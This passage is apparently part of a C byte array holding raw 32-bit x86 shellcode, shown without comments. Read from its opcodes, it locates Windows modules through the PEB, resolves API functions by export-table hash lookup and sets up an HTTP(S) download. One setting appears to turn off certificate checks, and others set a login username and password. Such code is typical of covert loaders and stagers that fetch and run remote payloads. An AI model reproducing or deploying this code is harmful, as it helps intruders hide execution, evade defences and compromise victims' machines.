252 0x89, 0x45, 0xcc, 0x83, 0x7d, 0x10, 0x00, 0x0f, 0x84, 0x8b, 0x00, 0x00,
253 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x18, 0x89, 0x45, 0xf0, 0x83, 0x7d,
254 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa8, 0x01,
255 0x00, 0x00, 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff, 0xff, 0x3f, 0x8d, 0x14,
256 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd0, 0x01, 0xd0, 0x8b, 0x10,
257 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0x10, 0x89,
258 0x44, 0x24, 0x04, 0x8b, 0x45, 0xc8, 0x89, 0x04, 0x24, 0xe8, 0x6a, 0x49,
259 0x00, 0x00, 0x85, 0xc0, 0x75, 0x2c, 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff,
260 0xff, 0x7f, 0x8d, 0x14, 0x00, 0x8b, 0x45, 0xcc, 0x01, 0xd0, 0x0f, 0xb7,
261 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b,
262 0x45, 0xd4, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89,
263 0x45, 0xf4, 0x83, 0x6d, 0xf0, 0x01, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0x29,
264 0x83, 0x7d, 0xf4, 0x00, 0x74, 0x90, 0xeb, 0x21, 0x8b, 0x45, 0xd8, 0x8b,
265 0x50, 0x10, 0x8b, 0x45, 0x14, 0x29, 0xd0, 0x8d, 0x14, 0x85, 0x00, 0x00,
266 0x00, 0x00, 0x8b, 0x45, 0xd4, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0x0c,
267 0x01, 0xd0, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xd8, 0x0f,
268 0x82, 0x06, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x50, 0x04, 0x8b,
269 0x45, 0xd8, 0x01, 0xd0, 0x39, 0x45, 0xf4, 0x0f, 0x83, 0xf2, 0x00, 0x00,
270 0x00, 0x8b, 0x45, 0xf4, 0x89, 0x45, 0xc4, 0xc7, 0x45, 0xec, 0x00, 0x00,
271 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x55, 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0,
272 0x0f, 0xb6, 0x00, 0x8d, 0x4d, 0x84, 0x8b, 0x55, 0xec, 0x01, 0xca, 0x88,
273 0x02, 0x8b, 0x55, 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
274 0x3c, 0x2e, 0x74, 0x1b, 0x83, 0x45, 0xec, 0x01, 0x8b, 0x55, 0xc4, 0x8b,
275 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x09, 0x83,
276 0x7d, 0xec, 0x3b, 0x76, 0xc3, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0xec, 0x83,
277 0xc0, 0x01, 0xc6, 0x44, 0x05, 0x84, 0x64, 0x8b, 0x45, 0xec, 0x83, 0xc0,
278 0x02, 0xc6, 0x44, 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x03,
279 0xc6, 0x44, 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x04, 0xc6,
280 0x44, 0x05, 0x84, 0x00, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x01, 0x01, 0x45,
281 0xc4, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55,
282 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x44,
283 0xff, 0xff, 0xff, 0x8b, 0x55, 0xec, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45,
284 0xec, 0x01, 0x8b, 0x55, 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6,
285 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xec, 0x3e, 0x76, 0xcf, 0x8d,
286 0x95, 0x44, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0xc6, 0x00,
287 0x00, 0x8d, 0x85, 0x44, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0x8d,
288 0x45, 0x84, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24,
289 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xdb, 0xfc, 0xff, 0xff,
290 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x81,
291 0xec, 0x98, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
292 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x19, 0x8b, 0x55, 0x0c,
293 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x4d, 0x84, 0x8b,
294 0x55, 0xec, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xec, 0x01, 0x8b, 0x55,
295 0x0c, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
296 0x06, 0x83, 0x7d, 0xec, 0x3f, 0x76, 0xd2, 0x8d, 0x55, 0x84, 0x8b, 0x45,
297 0xec, 0x01, 0xd0, 0xc6, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x83, 0xe8, 0x04,
298 0x0f, 0xb6, 0x44, 0x05, 0x84, 0x3c, 0x2e, 0x74, 0x46, 0x8b, 0x45, 0xec,
299 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0xc6, 0x44, 0x05, 0x84, 0x2e, 0x8b,
300 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0xc6, 0x44, 0x05, 0x84,
301 0x64, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0xc6, 0x44,
302 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec,
303 0xc6, 0x44, 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89,
304 0x55, 0xec, 0xc6, 0x44, 0x05, 0x84, 0x00, 0xc7, 0x45, 0xc8, 0x18, 0x00,
305 0x00, 0x00, 0x8b, 0x45, 0xc8, 0x64, 0x8b, 0x00, 0x89, 0x45, 0xc4, 0x8b,
306 0x45, 0xc4, 0x8b, 0x40, 0x30, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8, 0x8b,
307 0x40, 0x0c, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x8b, 0x40, 0x0c, 0x89,
308 0x45, 0xf4, 0xeb, 0x6e, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18, 0x89, 0x45,
309 0xe0, 0x8b, 0x45, 0xe0, 0x89, 0x45, 0xdc, 0x8b, 0x45, 0xdc, 0x8b, 0x40,
310 0x3c, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x89, 0x45, 0xd8, 0x8b,
311 0x45, 0xd8, 0x8b, 0x40, 0x78, 0x89, 0x45, 0xd4, 0x83, 0x7d, 0xd4, 0x00,
312 0x74, 0x37, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xd4, 0x01, 0xd0, 0x89, 0x45,
313 0xd0, 0x8b, 0x45, 0xd0, 0x8b, 0x50, 0x0c, 0x8b, 0x45, 0xe0, 0x01, 0xd0,
314 0x89, 0x45, 0xcc, 0x8b, 0x45, 0xcc, 0x89, 0x44, 0x24, 0x04, 0x8d, 0x45,
315 0x84, 0x89, 0x04, 0x24, 0xe8, 0x0f, 0x47, 0x00, 0x00, 0x85, 0xc0, 0x74,
316 0x09, 0x8b, 0x45, 0xe0, 0x89, 0x45, 0xf0, 0xeb, 0x01, 0x90, 0x8b, 0x45,
317 0xf4, 0x8b, 0x00, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18,
318 0x85, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0x82, 0x83, 0x7d,
319 0xf0, 0x00, 0x75, 0x14, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x30, 0x8d, 0x55,
320 0x84, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf0,
321 0x8b, 0x45, 0xf0, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x57, 0x56, 0x81, 0xec,
322 0x40, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x89, 0x85, 0xe0, 0xfd, 0xff,
323 0xff, 0x8b, 0x45, 0x14, 0x89, 0x85, 0xe4, 0xfd, 0xff, 0xff, 0x8b, 0x45,
324 0x18, 0x89, 0x85, 0xd8, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0x1c, 0x89, 0x85,
325 0xdc, 0xfd, 0xff, 0xff, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x8b,
326 0x45, 0x0c, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x3c, 0x89,
327 0xc2, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4,
328 0x83, 0xc0, 0x78, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x89,
329 0x45, 0xdc, 0x83, 0x7d, 0xdc, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
330 0x00, 0xe9, 0xb6, 0x02, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x8b, 0x45, 0xdc,
331 0x01, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x18, 0x89,
332 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
333 0x00, 0xe9, 0x92, 0x02, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x1c,
334 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0xd8, 0x8b,
335 0x50, 0x20, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xd0, 0x8b, 0x45,
336 0xd8, 0x8b, 0x50, 0x24, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xcc,
337 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x0c, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89,
338 0x45, 0xc8, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x21, 0x8b,
339 0x55, 0xc8, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8,
340 0x20, 0x89, 0xc2, 0x8d, 0x8d, 0xb4, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xf4,
341 0x01, 0xc8, 0x88, 0x10, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x55, 0xc8, 0x8b,
342 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xd0, 0x8d,
343 0x95, 0xb4, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0xc6, 0x00,
344 0x00, 0x8b, 0x85, 0xd8, 0xfd, 0xff, 0xff, 0x8b, 0x95, 0xdc, 0xfd, 0xff,
345 0xff, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8d, 0x85, 0xb4,
346 0xfe, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xd7, 0x4b, 0x00, 0x00, 0x89,
347 0x45, 0xc0, 0x89, 0x55, 0xc4, 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff, 0xff,
348 0x3f, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd0, 0x01,
349 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xbc, 0x8b,
350 0x85, 0xd8, 0xfd, 0xff, 0xff, 0x8b, 0x95, 0xdc, 0xfd, 0xff, 0xff, 0x89,
351 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45, 0xbc, 0x89, 0x04,
352 0x24, 0xe8, 0x94, 0x4b, 0x00, 0x00, 0x89, 0xc1, 0x33, 0x4d, 0xc0, 0x89,
353 0xce, 0x89, 0xd0, 0x33, 0x45, 0xc4, 0x89, 0xc7, 0x89, 0xf0, 0x33, 0x85,
354 0xe0, 0xfd, 0xff, 0xff, 0x89, 0x85, 0xd0, 0xfd, 0xff, 0xff, 0x89, 0xf8,
355 0x33, 0x85, 0xe4, 0xfd, 0xff, 0xff, 0x89, 0x85, 0xd4, 0xfd, 0xff, 0xff,
356 0x8b, 0x95, 0xd0, 0xfd, 0xff, 0xff, 0x8b, 0x8d, 0xd4, 0xfd, 0xff, 0xff,
357 0x89, 0xc8, 0x09, 0xd0, 0x85, 0xc0, 0x0f, 0x85, 0x55, 0x01, 0x00, 0x00,
358 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff, 0xff, 0x7f, 0x8d, 0x14, 0x00, 0x8b,
359 0x45, 0xcc, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14,
360 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd4, 0x01, 0xd0, 0x8b, 0x10,
361 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x3b,
362 0x45, 0xd8, 0x0f, 0x82, 0x18, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b,
363 0x50, 0x04, 0x8b, 0x45, 0xd8, 0x01, 0xd0, 0x39, 0x45, 0xec, 0x0f, 0x83,
364 0x04, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xb8, 0xc7, 0x45,
365 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2b, 0x8b, 0x55, 0xb8, 0x8b, 0x45,
366 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x74, 0xfe, 0xff, 0xff,
367 0x8b, 0x55, 0xf4, 0x01, 0xca, 0x88, 0x02, 0x8b, 0x55, 0xb8, 0x8b, 0x45,
368 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x1b, 0x83, 0x45,
369 0xf4, 0x01, 0x8b, 0x55, 0xb8, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6,
370 0x00, 0x84, 0xc0, 0x74, 0x09, 0x83, 0x7d, 0xf4, 0x3b, 0x76, 0xc0, 0xeb,
371 0x01, 0x90, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x01, 0xc6, 0x84, 0x05, 0x74,
372 0xfe, 0xff, 0xff, 0x64, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x02, 0xc6, 0x84,
373 0x05, 0x74, 0xfe, 0xff, 0xff, 0x6c, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x03,
374 0xc6, 0x84, 0x05, 0x74, 0xfe, 0xff, 0xff, 0x6c, 0x8b, 0x45, 0xf4, 0x83,
375 0xc0, 0x04, 0xc6, 0x84, 0x05, 0x74, 0xfe, 0xff, 0xff, 0x00, 0x8b, 0x45,
376 0xf4, 0x83, 0xc0, 0x01, 0x01, 0x45, 0xb8, 0xc7, 0x45, 0xf4, 0x00, 0x00,
377 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55, 0xb8, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
378 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0xf4, 0xfd, 0xff, 0xff, 0x8b, 0x55, 0xf4,
379 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x55, 0xb8, 0x8b,
380 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83,
381 0x7d, 0xf4, 0x7e, 0x76, 0xcf, 0x8d, 0x95, 0xf4, 0xfd, 0xff, 0xff, 0x8b,
382 0x45, 0xf4, 0x01, 0xd0, 0xc6, 0x00, 0x00, 0x8d, 0x85, 0xf4, 0xfd, 0xff,
383 0xff, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x85, 0x74, 0xfe, 0xff, 0xff, 0x89,
384 0x44, 0x24, 0x08, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45,
385 0x08, 0x89, 0x04, 0x24, 0xe8, 0x5e, 0xf8, 0xff, 0xff, 0x89, 0x45, 0xec,
386 0x8b, 0x45, 0xec, 0xeb, 0x17, 0x83, 0x6d, 0xf0, 0x01, 0x83, 0x7d, 0xf0,
387 0x00, 0x74, 0x0a, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x84, 0x18, 0xfe, 0xff,
388 0xff, 0x8b, 0x45, 0xec, 0x81, 0xc4, 0x40, 0x02, 0x00, 0x00, 0x5e, 0x5f,
389 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x58, 0x8b, 0x45, 0x0c, 0x89,
390 0x45, 0xd0, 0x8b, 0x45, 0x10, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0x14, 0x89,
391 0x45, 0xc8, 0x8b, 0x45, 0x18, 0x89, 0x45, 0xcc, 0xc7, 0x45, 0xf0, 0x00,
392 0x00, 0x00, 0x00, 0xc7, 0x45, 0xe4, 0x18, 0x00, 0x00, 0x00, 0x8b, 0x45,
393 0xe4, 0x64, 0x8b, 0x00, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe0, 0x8b, 0x40,
394 0x30, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x8b, 0x40, 0x0c, 0x89, 0x45,
395 0xe8, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xf4, 0xeb, 0x3c,
396 0x8b, 0x45, 0xf4, 0x8b, 0x48, 0x18, 0x8b, 0x45, 0xc8, 0x8b, 0x55, 0xcc,
397 0x89, 0x44, 0x24, 0x10, 0x89, 0x54, 0x24, 0x14, 0x8b, 0x45, 0xd0, 0x8b,
398 0x55, 0xd4, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x0c, 0x89, 0x4c,
399 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x50, 0xfc, 0xff,
400 0xff, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x45, 0xf4,
401 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x74, 0x06, 0x83, 0x7d,
402 0xf0, 0x00, 0x74, 0xb4, 0x8b, 0x45, 0xf0, 0xc9, 0xc3, 0x55, 0x89, 0xe5,
403 0x57, 0x56, 0x53, 0x81, 0xec, 0x5c, 0x03, 0x00, 0x00, 0xc7, 0x45, 0xe4,
404 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x90, 0x00, 0x00, 0x00, 0x00, 0xc7,
405 0x45, 0xe0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xd8, 0x00, 0x00, 0x00,
406 0x00, 0xc7, 0x45, 0xd4, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
407 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x89,
408 0x45, 0xd0, 0xc7, 0x45, 0xdc, 0x00, 0x03, 0x60, 0x04, 0xc7, 0x44, 0x24,
409 0x08, 0x3c, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
410 0x00, 0x8d, 0x85, 0x54, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xfd,
411 0x40, 0x00, 0x00, 0xc7, 0x85, 0x54, 0xff, 0xff, 0xff, 0x3c, 0x00, 0x00,
412 0x00, 0x8d, 0x85, 0x50, 0xfe, 0xff, 0xff, 0x89, 0x85, 0x64, 0xff, 0xff,
413 0xff, 0xc7, 0x85, 0x68, 0xff, 0xff, 0xff, 0x04, 0x01, 0x00, 0x00, 0x8d,
414 0x85, 0x4c, 0xfd, 0xff, 0xff, 0x89, 0x45, 0x80, 0xc7, 0x45, 0x84, 0x04,
415 0x01, 0x00, 0x00, 0x8d, 0x85, 0x0c, 0xfd, 0xff, 0xff, 0x89, 0x85, 0x70,
416 0xff, 0xff, 0xff, 0xc7, 0x85, 0x74, 0xff, 0xff, 0xff, 0x40, 0x00, 0x00,
417 0x00, 0x8d, 0x85, 0xcc, 0xfc, 0xff, 0xff, 0x89, 0x85, 0x78, 0xff, 0xff,
418 0xff, 0xc7, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x40, 0x00, 0x00, 0x00, 0x8b,
419 0x45, 0x08, 0x8b, 0x80, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8d,
420 0x8a, 0xf8, 0x08, 0x00, 0x00, 0x8d, 0x95, 0x54, 0xff, 0xff, 0xff, 0x89,
421 0x54, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x10, 0xc7,
422 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x0c, 0x24, 0xff, 0xd0,
423 0x83, 0xec, 0x10, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00,
424 0xe9, 0x58, 0x06, 0x00, 0x00, 0x8b, 0x85, 0x60, 0xff, 0xff, 0xff, 0x83,
425 0xf8, 0x04, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xd8, 0x83,
426 0x7d, 0xd8, 0x00, 0x74, 0x14, 0x81, 0x4d, 0xdc, 0x00, 0x00, 0x80, 0x00,
427 0x83, 0x7d, 0xd4, 0x00, 0x74, 0x07, 0x81, 0x4d, 0xdc, 0x00, 0x30, 0x00,
428 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xac, 0x00, 0x00, 0x00, 0xc7, 0x44,
429 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00,
430 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
431 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00,
432 0x00, 0xff, 0xd0, 0x83, 0xec, 0x14, 0x89, 0x45, 0xcc, 0x83, 0x7d, 0xcc,
433 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe4, 0x05, 0x00,
434 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x0f, 0xb7,
435 0x95, 0x6c, 0xff, 0xff, 0xff, 0x0f, 0xb7, 0xd2, 0xc7, 0x44, 0x24, 0x1c,
436 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x18, 0x00, 0x00, 0x00, 0x00,
437 0xc7, 0x44, 0x24, 0x14, 0x03, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10,
438 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00,
439 0x89, 0x54, 0x24, 0x08, 0x8d, 0x95, 0x50, 0xfe, 0xff, 0xff, 0x89, 0x54,
440 0x24, 0x04, 0x8b, 0x55, 0xcc, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
441 0x20, 0x89, 0x45, 0xc8, 0x83, 0x7d, 0xc8, 0x00, 0x0f, 0x84, 0xb6, 0x04,
442 0x00, 0x00, 0x8b, 0x45, 0x84, 0x85, 0xc0, 0x75, 0x0e, 0xc6, 0x85, 0x4c,
443 0xfd, 0xff, 0xff, 0x2f, 0xc6, 0x85, 0x4d, 0xfd, 0xff, 0xff, 0x00, 0x8b,
444 0x45, 0x08, 0x8b, 0x80, 0xc4, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c,
445 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xdc, 0x89, 0x54, 0x24, 0x18, 0xc7,
446 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
447 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d,
448 0x95, 0x4c, 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
449 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc8, 0x89, 0x14, 0x24, 0xff,
450 0xd0, 0x83, 0xec, 0x20, 0x89, 0x45, 0xc4, 0x83, 0x7d, 0xc4, 0x00, 0x0f,
451 0x84, 0x33, 0x04, 0x00, 0x00, 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x45, 0x8b,
452 0x45, 0xdc, 0x25, 0x00, 0x10, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x39, 0xc7,
453 0x45, 0xc0, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x9c, 0x80, 0x33, 0x00,
454 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb4, 0x00, 0x00, 0x00, 0xc7, 0x44,
455 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0x8d, 0x55, 0x9c, 0x89, 0x54, 0x24,
456 0x08, 0xc7, 0x44, 0x24, 0x04, 0x1f, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4,
457 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x8b, 0x85, 0x74, 0xff,
458 0xff, 0xff, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb4,
459 0x00, 0x00, 0x00, 0x8b, 0x8d, 0x74, 0xff, 0xff, 0xff, 0x8b, 0x95, 0x70,
460 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08, 0xc7,
461 0x44, 0x24, 0x04, 0x1c, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4, 0x89, 0x14,
462 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xe0, 0x8b, 0x85, 0x7c,
463 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x45, 0x08, 0x8b, 0x80,
464 0xb4, 0x00, 0x00, 0x00, 0x8b, 0x8d, 0x7c, 0xff, 0xff, 0xff, 0x8b, 0x95,
465 0x78, 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08,
466 0xc7, 0x44, 0x24, 0x04, 0x1d, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4, 0x89,
467 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xe0, 0x8b, 0x45,
468 0x08, 0x8b, 0x80, 0xc8, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
469 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7,
470 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00,
471 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
472 0xec, 0x14, 0x85, 0xc0, 0x0f, 0x84, 0x47, 0x02, 0x00, 0x00, 0xc7, 0x45,
473 0x94, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x90, 0x00, 0x00, 0x00, 0x00,
474 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xcc, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
475 0x10, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0x94, 0x89, 0x54, 0x24, 0x0c,
476 0x8d, 0x55, 0x90, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x13,
477 0x00, 0x00, 0x20, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
